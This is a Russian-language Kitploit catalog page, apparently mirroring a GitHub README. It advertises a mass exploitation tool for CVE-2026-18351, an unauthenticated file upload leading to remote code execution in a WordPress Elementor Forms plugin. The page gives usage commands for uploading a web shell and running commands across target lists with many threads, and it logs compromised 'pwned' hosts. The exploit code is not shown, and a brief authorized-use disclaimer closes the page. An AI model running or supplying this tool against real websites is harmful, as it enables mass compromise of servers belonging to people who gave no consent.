Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/johenlastgen-jlg/cve-2026-18351
Сканеры уязвимостейЭксплуатацияСкриптинг и автоматизацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHub
johenlastgen-jlg/cve-2026-18351

CVE-2026-18351

Массовый эксплойт-инструмент для CVE-2026-18351 — неаутентифицированная загрузка произвольных файлов с переходом к RCE в Elementor Forms <= 1.6.0, с пассивным зондированием, загрузкой шелла и выполнением команд.

Репозиторий
16 ч 29 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-18351

Массовый эксплойт для CVE-2026-18351 — неаутентифицированная загрузка произвольных файлов → RCE в Drag and Drop File Upload for Elementor Forms <= 1.6.0.

credit johenlastgen | telegram @johenlastgen | channel @jlgnetworkredirect


Возможности

  • Пассивная проверка уязвимости (без загрузки)
  • Полноценный режим эксплуатации с загрузкой шелла и подтверждением RCE
  • Поддержка одиночной цели и списка целей
  • Поддержка многопоточности
  • Настраиваемое выполнение команд
  • Полный лог, а также файлы вывода только уязвимых и только с подтверждённым RCE
  • Настройка таймаута запросов

Требования

Внешних зависимостей нет — используется только стандартная библиотека Python.

root@kitploit:~
python3 --version  # 3.6+

Использование

root@kitploit:~
# Одиночная цель — только пассивная проверка (без загрузки)
python3 mass.py --url http://target.com --check

# Одиночная цель — эксплуатация с командой по умолчанию (id)
python3 mass.py --url http://target.com --cmd id

# Одиночная цель — эксплуатация с произвольной командой
python3 mass.py --url http://target.com --cmd whoami

# Массовые цели — пассивная проверка
python3 mass.py --list targets.txt --threads 50 --check

# Массовые цели — эксплуатация
python3 mass.py --list targets.txt --threads 50 --cmd id

# Массовые цели — эксплуатация с настройкой таймаута
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami

# Сохранить полный лог
python3 mass.py --list targets.txt --output results.txt

# Сохранить только уязвимые цели
python3 mass.py --list targets.txt --output-vuln vuln.txt

# Сохранить только цели с подтверждённым RCE
python3 mass.py --list targets.txt --output-pwned pwned.txt

# Комбинированный вывод
python3 mass.py \
  --list targets.txt \
  --threads 50 \
  --cmd id \
  --output results.txt \
  --output-vuln vuln.txt \
  --output-pwned pwned.txt

Опции

ОпцияОписание
--urlURL одиночной цели
--list FILEФайл со списком URL целей (по одному в строке)
--checkТолько пассивная проверка — без загрузки файла
--cmd CMDКоманда для выполнения через шелл (по умолчанию: id)
--threads NКоличество одновременных потоков (по умолчанию: 20)
--timeout NТаймаут на запрос в секундах (по умолчанию: 10)
--output FILEСохранить полный лог в файл
--output-vuln FILEСохранить в файл только URL уязвимых целей
--output-pwned FILEСохранить в файл только цели с подтверждённым RCE

Состояния вывода

СостояниеЗначение
PWNEDШелл загружен и RCE подтверждён
VULN-NO-EXECЗагрузка принята, но выполнение шелла не удалось
PATCHEDЗагрузка отклонена или nonce не найден
ERRORСетевая ошибка или ошибка разбора

Формат targets.txt

Один URL в строке. Строки, начинающиеся с #, игнорируются.

root@kitploit:~
http://target1.com
https://target2.com
# this line is ignored
http://target3.com

Отказ от ответственности

Этот проект предоставляется исключительно для авторизованных оценок безопасности, исследований в области защитной безопасности и проверки уязвимостей.

Используя это программное обеспечение, вы подтверждаете, что у вас есть явное разрешение на оценку целевых систем. Несанкционированный доступ к компьютерным системам запрещён и может нарушать применимое законодательство.

Автор и участники не поощряют и не одобряют несанкционированное использование этого проекта и не несут никакой ответственности за любое неправомерное использование, ущерб или юридические последствия, возникшие в результате его использования.


Автор

JohenLastGen — JLG NETWORK

Скачать инструмент